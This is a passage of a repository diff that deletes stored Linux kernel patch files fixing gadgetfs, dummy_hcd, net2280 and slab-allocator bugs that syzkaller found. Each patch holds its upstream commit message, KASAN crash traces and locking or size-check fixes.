-returning, thereby ensuring that the UDC is no longer in use.
-
-The patch also adds a check in the dev_ioctl() routine to make sure
-the driver is bound to a UDC before dereferencing the gadget pointer,
-and it makes destroy_ep_files() synchronize with the endpoint I/O
-routines, to prevent the user from accessing an endpoint data
-structure after it has been removed.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Acked-by: Felipe Balbi <felipe.balbi@linux.intel.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/gadget/legacy/inode.c | 41 ++++++++++++++++++++++++++++++++++-----
- 1 file changed, 36 insertions(+), 5 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 956b3dc7c3a4d..5c28bee327e15 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -28,7 +28,7 @@
- #include <linux/aio.h>
- #include <linux/uio.h>
- #include <linux/refcount.h>
--
-+#include <linux/delay.h>
- #include <linux/device.h>
- #include <linux/moduleparam.h>
- 
-@@ -116,6 +116,7 @@ enum ep0_state {
- struct dev_data {
- 	spinlock_t			lock;
- 	refcount_t			count;
-+	int				udc_usage;
- 	enum ep0_state			state;		/* P: lock */
- 	struct usb_gadgetfs_event	event [N_EVENT];
- 	unsigned			ev_next;
-@@ -513,9 +514,9 @@ static void ep_aio_complete(struct usb_ep *ep, struct usb_request *req)
- 		INIT_WORK(&priv->work, ep_user_copy_worker);
- 		schedule_work(&priv->work);
- 	}
--	spin_unlock(&epdata->dev->lock);
- 
- 	usb_ep_free_request(ep, req);
-+	spin_unlock(&epdata->dev->lock);
- 	put_ep(epdata);
- }
- 
-@@ -939,9 +940,11 @@ ep0_read (struct file *fd, char __user *buf, size_t len, loff_t *ptr)
- 			struct usb_request	*req = dev->req;
- 
- 			if ((retval = setup_req (ep, req, 0)) == 0) {
-+				++dev->udc_usage;
- 				spin_unlock_irq (&dev->lock);
- 				retval = usb_ep_queue (ep, req, GFP_KERNEL);
- 				spin_lock_irq (&dev->lock);
-+				--dev->udc_usage;
- 			}
- 			dev->state = STATE_DEV_CONNECTED;
- 
-@@ -1134,6 +1137,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 			retval = setup_req (dev->gadget->ep0, dev->req, len);
- 			if (retval == 0) {
- 				dev->state = STATE_DEV_CONNECTED;
-+				++dev->udc_usage;
- 				spin_unlock_irq (&dev->lock);
- 				if (copy_from_user (dev->req->buf, buf, len))
- 					retval = -EFAULT;
-@@ -1145,6 +1149,7 @@ ep0_write (struct file *fd, const char __user *buf, size_t len, loff_t *ptr)
- 						GFP_KERNEL);
- 				}
- 				spin_lock_irq(&dev->lock);
-+				--dev->udc_usage;
- 				if (retval < 0) {
- 					clean_req (dev->gadget->ep0, dev->req);
- 				} else
-@@ -1246,9 +1251,21 @@ static long dev_ioctl (struct file *fd, unsigned code, unsigned long value)
- 	struct usb_gadget	*gadget = dev->gadget;
- 	long ret = -ENOTTY;
- 
--	if (gadget->ops->ioctl)
-+	spin_lock_irq(&dev->lock);
-+	if (dev->state == STATE_DEV_OPENED ||
-+			dev->state == STATE_DEV_UNBOUND) {
-+		/* Not bound to a UDC */
-+	} else if (gadget->ops->ioctl) {
-+		++dev->udc_usage;
-+		spin_unlock_irq(&dev->lock);
-+
- 		ret = gadget->ops->ioctl (gadget, code, value);
- 
-+		spin_lock_irq(&dev->lock);
-+		--dev->udc_usage;
-+	}
-+	spin_unlock_irq(&dev->lock);
-+
- 	return ret;
- }
- 
-@@ -1466,10 +1483,12 @@ gadgetfs_setup (struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
- 				if (value < 0)
- 					break;
- 
-+				++dev->udc_usage;
- 				spin_unlock (&dev->lock);
- 				value = usb_ep_queue (gadget->ep0, dev->req,
- 							GFP_KERNEL);
- 				spin_lock (&dev->lock);
-+				--dev->udc_usage;
- 				if (value < 0) {
- 					clean_req (gadget->ep0, dev->req);
- 					break;
-@@ -1493,8 +1512,12 @@ gadgetfs_setup (struct usb_gadget *gadget, const struct usb_ctrlrequest *ctrl)
- 		req->length = value;
- 		req->zero = value < w_length;
- 
-+		++dev->udc_usage;
- 		spin_unlock (&dev->lock);
- 		value = usb_ep_queue (gadget->ep0, req, GFP_KERNEL);
-+		spin_lock(&dev->lock);
-+		--dev->udc_usage;
-+		spin_unlock(&dev->lock);
- 		if (value < 0) {
- 			DBG (dev, "ep_queue --> %d\n", value);
- 			req->status = 0;
-@@ -1521,21 +1544,24 @@ static void destroy_ep_files (struct dev_data *dev)
- 		/* break link to FS */
- 		ep = list_first_entry (&dev->epfiles, struct ep_data, epfiles);
- 		list_del_init (&ep->epfiles);
-+		spin_unlock_irq (&dev->lock);
-+
- 		dentry = ep->dentry;
- 		ep->dentry = NULL;
- 		parent = d_inode(dentry->d_parent);
- 
- 		/* break link to controller */
-+		mutex_lock(&ep->lock);
- 		if (ep->state == STATE_EP_ENABLED)
- 			(void) usb_ep_disable (ep->ep);
- 		ep->state = STATE_EP_UNBOUND;
- 		usb_ep_free_request (ep->ep, ep->req);
- 		ep->ep = NULL;
-+		mutex_unlock(&ep->lock);
-+
- 		wake_up (&ep->wait);
- 		put_ep (ep);
- 
--		spin_unlock_irq (&dev->lock);
--
- 		/* break link to dcache */
- 		inode_lock(parent);
- 		d_delete (dentry);
-@@ -1606,6 +1632,11 @@ gadgetfs_unbind (struct usb_gadget *gadget)
- 
- 	spin_lock_irq (&dev->lock);
- 	dev->state = STATE_DEV_UNBOUND;
-+	while (dev->udc_usage > 0) {
-+		spin_unlock_irq(&dev->lock);
-+		usleep_range(1000, 2000);
-+		spin_lock_irq(&dev->lock);
-+	}
- 	spin_unlock_irq (&dev->lock);
- 
- 	destroy_ep_files (dev);
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch
deleted file mode 100644
index d6963da2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0003.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 6e76c01e71551cb221c1f3deacb9dcd9a7346784 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Thu, 21 Sep 2017 16:12:01 -0400
-Subject: [PATCH] USB: gadgetfs: fix copy_to_user while holding spinlock
-
-The gadgetfs driver as a long-outstanding FIXME, regarding a call of
-copy_to_user() made while holding a spinlock.  This patch fixes the
-issue by dropping the spinlock and using the dev->udc_usage mechanism
-introduced by another recent patch to guard against status changes
-while the lock isn't held.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Acked-by: Felipe Balbi <felipe.balbi@linux.intel.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/gadget/legacy/inode.c | 5 ++++-
- 1 file changed, 4 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 684900fcfe24c..956b3dc7c3a4d 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -983,11 +983,14 @@ ep0_read (struct file *fd, char __user *buf, size_t len, loff_t *ptr)
- 				retval = -EIO;
- 			else {
- 				len = min (len, (size_t)dev->req->actual);
--// FIXME don't call this with the spinlock held ...
-+				++dev->udc_usage;
-+				spin_unlock_irq(&dev->lock);
- 				if (copy_to_user (buf, dev->req->buf, len))
- 					retval = -EFAULT;
- 				else
- 					retval = len;
-+				spin_lock_irq(&dev->lock);
-+				--dev->udc_usage;
- 				clean_req (dev->gadget->ep0, dev->req);
- 				/* NOTE userspace can't yet choose to stall */
- 			}
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch
deleted file mode 100644
index 5d159efe..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0004.patch
+++ /dev/null
@@ -1,264 +0,0 @@
-From f16443a034c7aa359ddf6f0f9bc40d01ca31faea Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Tue, 13 Jun 2017 15:23:42 -0400
-Subject: [PATCH] USB: gadgetfs, dummy-hcd, net2280: fix locking for callbacks
-
-Using the syzkaller kernel fuzzer, Andrey Konovalov generated the
-following error in gadgetfs:
-
-> BUG: KASAN: use-after-free in __lock_acquire+0x3069/0x3690
-> kernel/locking/lockdep.c:3246
-> Read of size 8 at addr ffff88003a2bdaf8 by task kworker/3:1/903
->
-> CPU: 3 PID: 903 Comm: kworker/3:1 Not tainted 4.12.0-rc4+ #35
-> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-> Workqueue: usb_hub_wq hub_event
-> Call Trace:
->  __dump_stack lib/dump_stack.c:16 [inline]
->  dump_stack+0x292/0x395 lib/dump_stack.c:52
->  print_address_description+0x78/0x280 mm/kasan/report.c:252
->  kasan_report_error mm/kasan/report.c:351 [inline]
->  kasan_report+0x230/0x340 mm/kasan/report.c:408
->  __asan_report_load8_noabort+0x19/0x20 mm/kasan/report.c:429
->  __lock_acquire+0x3069/0x3690 kernel/locking/lockdep.c:3246
->  lock_acquire+0x22d/0x560 kernel/locking/lockdep.c:3855
->  __raw_spin_lock include/linux/spinlock_api_smp.h:142 [inline]
->  _raw_spin_lock+0x2f/0x40 kernel/locking/spinlock.c:151
->  spin_lock include/linux/spinlock.h:299 [inline]
->  gadgetfs_suspend+0x89/0x130 drivers/usb/gadget/legacy/inode.c:1682
->  set_link_state+0x88e/0xae0 drivers/usb/gadget/udc/dummy_hcd.c:455
->  dummy_hub_control+0xd7e/0x1fb0 drivers/usb/gadget/udc/dummy_hcd.c:2074
->  rh_call_control drivers/usb/core/hcd.c:689 [inline]
->  rh_urb_enqueue drivers/usb/core/hcd.c:846 [inline]
->  usb_hcd_submit_urb+0x92f/0x20b0 drivers/usb/core/hcd.c:1650
->  usb_submit_urb+0x8b2/0x12c0 drivers/usb/core/urb.c:542
->  usb_start_wait_urb+0x148/0x5b0 drivers/usb/core/message.c:56
->  usb_internal_control_msg drivers/usb/core/message.c:100 [inline]
->  usb_control_msg+0x341/0x4d0 drivers/usb/core/message.c:151
->  usb_clear_port_feature+0x74/0xa0 drivers/usb/core/hub.c:412
->  hub_port_disable+0x123/0x510 drivers/usb/core/hub.c:4177
->  hub_port_init+0x1ed/0x2940 drivers/usb/core/hub.c:4648
->  hub_port_connect drivers/usb/core/hub.c:4826 [inline]
->  hub_port_connect_change drivers/usb/core/hub.c:4999 [inline]
->  port_event drivers/usb/core/hub.c:5105 [inline]
->  hub_event+0x1ae1/0x3d40 drivers/usb/core/hub.c:5185
->  process_one_work+0xc08/0x1bd0 kernel/workqueue.c:2097
->  process_scheduled_works kernel/workqueue.c:2157 [inline]
->  worker_thread+0xb2b/0x1860 kernel/workqueue.c:2233
->  kthread+0x363/0x440 kernel/kthread.c:231
->  ret_from_fork+0x2a/0x40 arch/x86/entry/entry_64.S:424
->
-> Allocated by task 9958:
->  save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
->  save_stack+0x43/0xd0 mm/kasan/kasan.c:513
->  set_track mm/kasan/kasan.c:525 [inline]
->  kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617
->  kmem_cache_alloc_trace+0x87/0x280 mm/slub.c:2745
->  kmalloc include/linux/slab.h:492 [inline]
->  kzalloc include/linux/slab.h:665 [inline]
->  dev_new drivers/usb/gadget/legacy/inode.c:170 [inline]
->  gadgetfs_fill_super+0x24f/0x540 drivers/usb/gadget/legacy/inode.c:1993
->  mount_single+0xf6/0x160 fs/super.c:1192
->  gadgetfs_mount+0x31/0x40 drivers/usb/gadget/legacy/inode.c:2019
->  mount_fs+0x9c/0x2d0 fs/super.c:1223
->  vfs_kern_mount.part.25+0xcb/0x490 fs/namespace.c:976
->  vfs_kern_mount fs/namespace.c:2509 [inline]
->  do_new_mount fs/namespace.c:2512 [inline]
->  do_mount+0x41b/0x2d90 fs/namespace.c:2834
->  SYSC_mount fs/namespace.c:3050 [inline]
->  SyS_mount+0xb0/0x120 fs/namespace.c:3027
->  entry_SYSCALL_64_fastpath+0x1f/0xbe
->
-> Freed by task 9960:
->  save_stack_trace+0x1b/0x20 arch/x86/kernel/stacktrace.c:59
->  save_stack+0x43/0xd0 mm/kasan/kasan.c:513
->  set_track mm/kasan/kasan.c:525 [inline]
->  kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590
->  slab_free_hook mm/slub.c:1357 [inline]
->  slab_free_freelist_hook mm/slub.c:1379 [inline]
->  slab_free mm/slub.c:2961 [inline]
->  kfree+0xed/0x2b0 mm/slub.c:3882
->  put_dev+0x124/0x160 drivers/usb/gadget/legacy/inode.c:163
->  gadgetfs_kill_sb+0x33/0x60 drivers/usb/gadget/legacy/inode.c:2027
->  deactivate_locked_super+0x8d/0xd0 fs/super.c:309
->  deactivate_super+0x21e/0x310 fs/super.c:340
->  cleanup_mnt+0xb7/0x150 fs/namespace.c:1112
->  __cleanup_mnt+0x1b/0x20 fs/namespace.c:1119
->  task_work_run+0x1a0/0x280 kernel/task_work.c:116
->  exit_task_work include/linux/task_work.h:21 [inline]
->  do_exit+0x18a8/0x2820 kernel/exit.c:878
->  do_group_exit+0x14e/0x420 kernel/exit.c:982
->  get_signal+0x784/0x1780 kernel/signal.c:2318
->  do_signal+0xd7/0x2130 arch/x86/kernel/signal.c:808
->  exit_to_usermode_loop+0x1ac/0x240 arch/x86/entry/common.c:157
->  prepare_exit_to_usermode arch/x86/entry/common.c:194 [inline]
->  syscall_return_slowpath+0x3ba/0x410 arch/x86/entry/common.c:263
->  entry_SYSCALL_64_fastpath+0xbc/0xbe
->
-> The buggy address belongs to the object at ffff88003a2bdae0
->  which belongs to the cache kmalloc-1024 of size 1024
-> The buggy address is located 24 bytes inside of
->  1024-byte region [ffff88003a2bdae0, ffff88003a2bdee0)
-> The buggy address belongs to the page:
-> page:ffffea0000e8ae00 count:1 mapcount:0 mapping:          (null)
-> index:0x0 compound_mapcount: 0
-> flags: 0x100000000008100(slab|head)
-> raw: 0100000000008100 0000000000000000 0000000000000000 0000000100170017
-> raw: ffffea0000ed3020 ffffea0000f5f820 ffff88003e80efc0 0000000000000000
-> page dumped because: kasan: bad access detected
->
-> Memory state around the buggy address:
->  ffff88003a2bd980: fb fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
->  ffff88003a2bda00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
-> >ffff88003a2bda80: fc fc fc fc fc fc fc fc fc fc fc fc fb fb fb fb
->                                                                 ^
->  ffff88003a2bdb00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
->  ffff88003a2bdb80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-> ==================================================================
-
-What this means is that the gadgetfs_suspend() routine was trying to
-access dev->lock after it had been deallocated.  The root cause is a
-race in the dummy_hcd driver; the dummy_udc_stop() routine can race
-with the rest of the driver because it contains no locking.  And even
-when proper locking is added, it can still race with the
-set_link_state() function because that function incorrectly drops the
-private spinlock before invoking any gadget driver callbacks.
-
-The result of this race, as seen above, is that set_link_state() can
-invoke a callback in gadgetfs even after gadgetfs has been unbound
-from dummy_hcd's UDC and its private data structures have been
-deallocated.
-
-include/linux/usb/gadget.h documents that the ->reset, ->disconnect,
-->suspend, and ->resume callbacks may be invoked in interrupt context.
-In general this is necessary, to prevent races with gadget driver
-removal.  This patch fixes dummy_hcd to retain the spinlock across
-these calls, and it adds a spinlock acquisition to dummy_udc_stop() to
-prevent the race.
-
-The net2280 driver makes the same mistake of dropping the private
-spinlock for its ->disconnect and ->reset callback invocations.  The
-patch fixes it too.
-
-Lastly, since gadgetfs_suspend() may be invoked in interrupt context,
-it cannot assume that interrupts are enabled when it runs.  It must
-use spin_lock_irqsave() instead of spin_lock_irq().  The patch fixes
-that bug as well.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-and-tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Acked-by: Felipe Balbi <felipe.balbi@linux.intel.com>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- drivers/usb/gadget/legacy/inode.c  |  5 +++--
- drivers/usb/gadget/udc/dummy_hcd.c | 13 ++++---------
- drivers/usb/gadget/udc/net2280.c   |  9 +--------
- 3 files changed, 8 insertions(+), 19 deletions(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index 5ffd879f78868..684900fcfe24c 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1679,9 +1679,10 @@ static void
- gadgetfs_suspend (struct usb_gadget *gadget)
- {
- 	struct dev_data		*dev = get_gadget_data (gadget);
-+	unsigned long		flags;
- 
- 	INFO (dev, "suspended from state %d\n", dev->state);
--	spin_lock (&dev->lock);
-+	spin_lock_irqsave(&dev->lock, flags);
- 	switch (dev->state) {
- 	case STATE_DEV_SETUP:		// VERY odd... host died??
- 	case STATE_DEV_CONNECTED:
-@@ -1692,7 +1693,7 @@ gadgetfs_suspend (struct usb_gadget *gadget)
- 	default:
- 		break;
- 	}
--	spin_unlock (&dev->lock);
-+	spin_unlock_irqrestore(&dev->lock, flags);
- }
- 
- static struct usb_gadget_driver gadgetfs_driver = {
-diff --git a/drivers/usb/gadget/udc/dummy_hcd.c b/drivers/usb/gadget/udc/dummy_hcd.c
-index ccabb51cb98da..7635fd7cc328c 100644
---- a/drivers/usb/gadget/udc/dummy_hcd.c
-+++ b/drivers/usb/gadget/udc/dummy_hcd.c
-@@ -442,23 +442,16 @@ static void set_link_state(struct dummy_hcd *dum_hcd)
- 		/* Report reset and disconnect events to the driver */
- 		if (dum->driver && (disconnect || reset)) {
- 			stop_activity(dum);
--			spin_unlock(&dum->lock);
- 			if (reset)
- 				usb_gadget_udc_reset(&dum->gadget, dum->driver);
- 			else
- 				dum->driver->disconnect(&dum->gadget);
--			spin_lock(&dum->lock);
- 		}
- 	} else if (dum_hcd->active != dum_hcd->old_active) {
--		if (dum_hcd->old_active && dum->driver->suspend) {
--			spin_unlock(&dum->lock);
-+		if (dum_hcd->old_active && dum->driver->suspend)
- 			dum->driver->suspend(&dum->gadget);
--			spin_lock(&dum->lock);
--		} else if (!dum_hcd->old_active &&  dum->driver->resume) {
--			spin_unlock(&dum->lock);
-+		else if (!dum_hcd->old_active &&  dum->driver->resume)
- 			dum->driver->resume(&dum->gadget);
--			spin_lock(&dum->lock);
--		}
- 	}
- 
- 	dum_hcd->old_status = dum_hcd->port_status;
-@@ -983,7 +976,9 @@ static int dummy_udc_stop(struct usb_gadget *g)
- 	struct dummy_hcd	*dum_hcd = gadget_to_dummy_hcd(g);
- 	struct dummy		*dum = dum_hcd->dum;
- 
-+	spin_lock_irq(&dum->lock);
- 	dum->driver = NULL;
-+	spin_unlock_irq(&dum->lock);
- 
- 	return 0;
- }
-diff --git a/drivers/usb/gadget/udc/net2280.c b/drivers/usb/gadget/udc/net2280.c
-index 6cf07857eacaa..f2cbd7f8005e1 100644
---- a/drivers/usb/gadget/udc/net2280.c
-+++ b/drivers/usb/gadget/udc/net2280.c
-@@ -2470,11 +2470,8 @@ static void stop_activity(struct net2280 *dev, struct usb_gadget_driver *driver)
- 		nuke(&dev->ep[i]);
- 
- 	/* report disconnect; the driver is already quiesced */
--	if (driver) {
--		spin_unlock(&dev->lock);
-+	if (driver)
- 		driver->disconnect(&dev->gadget);
--		spin_lock(&dev->lock);
--	}
- 
- 	usb_reinit(dev);
- }
-@@ -3348,8 +3345,6 @@ static void handle_stat0_irqs(struct net2280 *dev, u32 stat)
- 		BIT(PCI_RETRY_ABORT_INTERRUPT))
- 
- static void handle_stat1_irqs(struct net2280 *dev, u32 stat)
--__releases(dev->lock)
--__acquires(dev->lock)
- {
- 	struct net2280_ep	*ep;
- 	u32			tmp, num, mask, scratch;
-@@ -3390,14 +3385,12 @@ __acquires(dev->lock)
- 			if (disconnect || reset) {
- 				stop_activity(dev, dev->driver);
- 				ep0_start(dev);
--				spin_unlock(&dev->lock);
- 				if (reset)
- 					usb_gadget_udc_reset
- 						(&dev->gadget, dev->driver);
- 				else
- 					(dev->driver->disconnect)
- 						(&dev->gadget);
--				spin_lock(&dev->lock);
- 				return;
- 			}
- 		}
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch
deleted file mode 100644
index 066bb3a0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0005.patch
+++ /dev/null
@@ -1,89 +0,0 @@
-From f50b878fed33e360d01dcdc31a8eeb1815d033d5 Mon Sep 17 00:00:00 2001
-From: Alan Stern <stern@rowland.harvard.edu>
-Date: Thu, 8 Jun 2017 13:55:59 -0400
-Subject: [PATCH] USB: gadget: fix GPF in gadgetfs
-
-A NULL-pointer dereference bug in gadgetfs was uncovered by syzkaller:
-
-> kasan: GPF could be caused by NULL-ptr deref or user memory access
-> general protection fault: 0000 [#1] SMP KASAN
-> Dumping ftrace buffer:
->    (ftrace buffer empty)
-> Modules linked in:
-> CPU: 2 PID: 4820 Comm: syz-executor0 Not tainted 4.12.0-rc4+ #5
-> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-> task: ffff880039542dc0 task.stack: ffff88003bdd0000
-> RIP: 0010:__list_del_entry_valid+0x7e/0x170 lib/list_debug.c:51
-> RSP: 0018:ffff88003bdd6e50 EFLAGS: 00010246
-> RAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000010000
-> RDX: 0000000000000000 RSI: ffffffff86504948 RDI: ffffffff86504950
-> RBP: ffff88003bdd6e68 R08: ffff880039542dc0 R09: ffffffff8778ce00
-> R10: ffff88003bdd6e68 R11: dffffc0000000000 R12: 0000000000000000
-> R13: dffffc0000000000 R14: 1ffff100077badd2 R15: ffffffff864d2e40
-> FS:  0000000000000000(0000) GS:ffff88006dc00000(0000) knlGS:0000000000000000
-> CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
-> CR2: 000000002014aff9 CR3: 0000000006022000 CR4: 00000000000006e0
-> Call Trace:
->  __list_del_entry include/linux/list.h:116 [inline]
->  list_del include/linux/list.h:124 [inline]
->  usb_gadget_unregister_driver+0x166/0x4c0 drivers/usb/gadget/udc/core.c:1387
->  dev_release+0x80/0x160 drivers/usb/gadget/legacy/inode.c:1187
->  __fput+0x332/0x7f0 fs/file_table.c:209
->  ____fput+0x15/0x20 fs/file_table.c:245
->  task_work_run+0x19b/0x270 kernel/task_work.c:116
->  exit_task_work include/linux/task_work.h:21 [inline]
->  do_exit+0x18a3/0x2820 kernel/exit.c:878
->  do_group_exit+0x149/0x420 kernel/exit.c:982
->  get_signal+0x77f/0x1780 kernel/signal.c:2318
->  do_signal+0xd2/0x2130 arch/x86/kernel/signal.c:808
->  exit_to_usermode_loop+0x1a7/0x240 arch/x86/entry/common.c:157
->  prepare_exit_to_usermode arch/x86/entry/common.c:194 [inline]
->  syscall_return_slowpath+0x3ba/0x410 arch/x86/entry/common.c:263
->  entry_SYSCALL_64_fastpath+0xbc/0xbe
-> RIP: 0033:0x4461f9
-> RSP: 002b:00007fdac2b1ecf8 EFLAGS: 00000246 ORIG_RAX: 00000000000000ca
-> RAX: fffffffffffffe00 RBX: 00000000007080c8 RCX: 00000000004461f9
-> RDX: 0000000000000000 RSI: 0000000000000000 RDI: 00000000007080c8
-> RBP: 00000000007080a8 R08: 0000000000000000 R09: 0000000000000000
-> R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
-> R13: 0000000000000000 R14: 00007fdac2b1f9c0 R15: 00007fdac2b1f700
-> Code: 00 00 00 00 ad de 49 39 c4 74 6a 48 b8 00 02 00 00 00 00 ad de
-> 48 89 da 48 39 c3 74 74 48 c1 ea 03 48 b8 00 00 00 00 00 fc ff df <80>
-> 3c 02 00 0f 85 92 00 00 00 48 8b 13 48 39 f2 75 66 49 8d 7c
-> RIP: __list_del_entry_valid+0x7e/0x170 lib/list_debug.c:51 RSP: ffff88003bdd6e50
-> ---[ end trace 30e94b1eec4831c8 ]---
-> Kernel panic - not syncing: Fatal exception
-
-The bug was caused by dev_release() failing to turn off its
-gadget_registered flag after unregistering the gadget driver.  As a
-result, when a later user closed the device file before writing a
-valid set of descriptors, dev_release() thought the gadget had been
-registered and tried to unregister it, even though it had not been.
-This led to the NULL pointer dereference.
-
-The fix is simple: turn off the flag when the gadget is unregistered.
-
-Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
-Reported-and-tested-by: Andrey Konovalov <andreyknvl@google.com>
-CC: <stable@vger.kernel.org>
-Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
----
- drivers/usb/gadget/legacy/inode.c | 4 +++-
- 1 file changed, 3 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/usb/gadget/legacy/inode.c b/drivers/usb/gadget/legacy/inode.c
-index b9ca0a26cbd93..5ffd879f78868 100644
---- a/drivers/usb/gadget/legacy/inode.c
-+++ b/drivers/usb/gadget/legacy/inode.c
-@@ -1183,8 +1183,10 @@ dev_release (struct inode *inode, struct file *fd)
- 
- 	/* closing ep0 === shutdown all */
- 
--	if (dev->gadget_registered)
-+	if (dev->gadget_registered) {
- 		usb_gadget_unregister_driver (&gadgetfs_driver);
-+		dev->gadget_registered = false;
-+	}
- 
- 	/* at this point "good" hardware has disconnected the
- 	 * device from USB; the host won't see it any more.
diff --git a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch b/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch
deleted file mode 100644
index 674ca7fa..00000000
--- a/Patches/Linux_CVEs/CVE-2016-GadgetFS/ANY/0006.patch
+++ /dev/null
@@ -1,75 +0,0 @@
-From bb1107f7c6052c863692a41f78c000db792334bf Mon Sep 17 00:00:00 2001
-From: Michal Hocko <mhocko@suse.com>
-Date: Tue, 10 Jan 2017 16:57:27 -0800
-Subject: [PATCH] mm, slab: make sure that KMALLOC_MAX_SIZE will fit into
- MAX_ORDER
-
-Andrey Konovalov has reported the following warning triggered by the
-syzkaller fuzzer.
-
-  WARNING: CPU: 1 PID: 9935 at mm/page_alloc.c:3511 __alloc_pages_nodemask+0x159c/0x1e20
-  Kernel panic - not syncing: panic_on_warn set ...
-  CPU: 1 PID: 9935 Comm: syz-executor0 Not tainted 4.9.0-rc7+ #34
-  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011
-  Call Trace:
-    __alloc_pages_slowpath mm/page_alloc.c:3511
-    __alloc_pages_nodemask+0x159c/0x1e20 mm/page_alloc.c:3781
-    alloc_pages_current+0x1c7/0x6b0 mm/mempolicy.c:2072
-    alloc_pages include/linux/gfp.h:469
-    kmalloc_order+0x1f/0x70 mm/slab_common.c:1015
-    kmalloc_order_trace+0x1f/0x160 mm/slab_common.c:1026
-    kmalloc_large include/linux/slab.h:422
-    __kmalloc+0x210/0x2d0 mm/slub.c:3723
-    kmalloc include/linux/slab.h:495
-    ep_write_iter+0x167/0xb50 drivers/usb/gadget/legacy/inode.c:664
-    new_sync_write fs/read_write.c:499
-    __vfs_write+0x483/0x760 fs/read_write.c:512
-    vfs_write+0x170/0x4e0 fs/read_write.c:560
-    SYSC_write fs/read_write.c:607
-    SyS_write+0xfb/0x230 fs/read_write.c:599
-    entry_SYSCALL_64_fastpath+0x1f/0xc2
-
-The issue is caused by a lack of size check for the request size in
-ep_write_iter which should be fixed.  It, however, points to another
-problem, that SLUB defines KMALLOC_MAX_SIZE too large because the its
-KMALLOC_SHIFT_MAX is (MAX_ORDER + PAGE_SHIFT) which means that the
-resulting page allocator request might be MAX_ORDER which is too large
-(see __alloc_pages_slowpath).
-
-The same applies to the SLOB allocator which allows even larger sizes.
-Make sure that they are capped properly and never request more than
-MAX_ORDER order.
-
-Link: http://lkml.kernel.org/r/20161220130659.16461-2-mhocko@kernel.org
-Signed-off-by: Michal Hocko <mhocko@suse.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Acked-by: Christoph Lameter <cl@linux.com>
-Cc: Alexei Starovoitov <ast@kernel.org>
-Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
----
- include/linux/slab.h | 4 ++--
- 1 file changed, 2 insertions(+), 2 deletions(-)
-
-diff --git a/include/linux/slab.h b/include/linux/slab.h
-index 084b12bad1982..4c53635668154 100644
---- a/include/linux/slab.h
-+++ b/include/linux/slab.h
-@@ -226,7 +226,7 @@ static inline const char *__check_heap_object(const void *ptr,
-  * (PAGE_SIZE*2).  Larger requests are passed to the page allocator.
-  */
- #define KMALLOC_SHIFT_HIGH	(PAGE_SHIFT + 1)
--#define KMALLOC_SHIFT_MAX	(MAX_ORDER + PAGE_SHIFT)
-+#define KMALLOC_SHIFT_MAX	(MAX_ORDER + PAGE_SHIFT - 1)
- #ifndef KMALLOC_SHIFT_LOW
- #define KMALLOC_SHIFT_LOW	3
- #endif
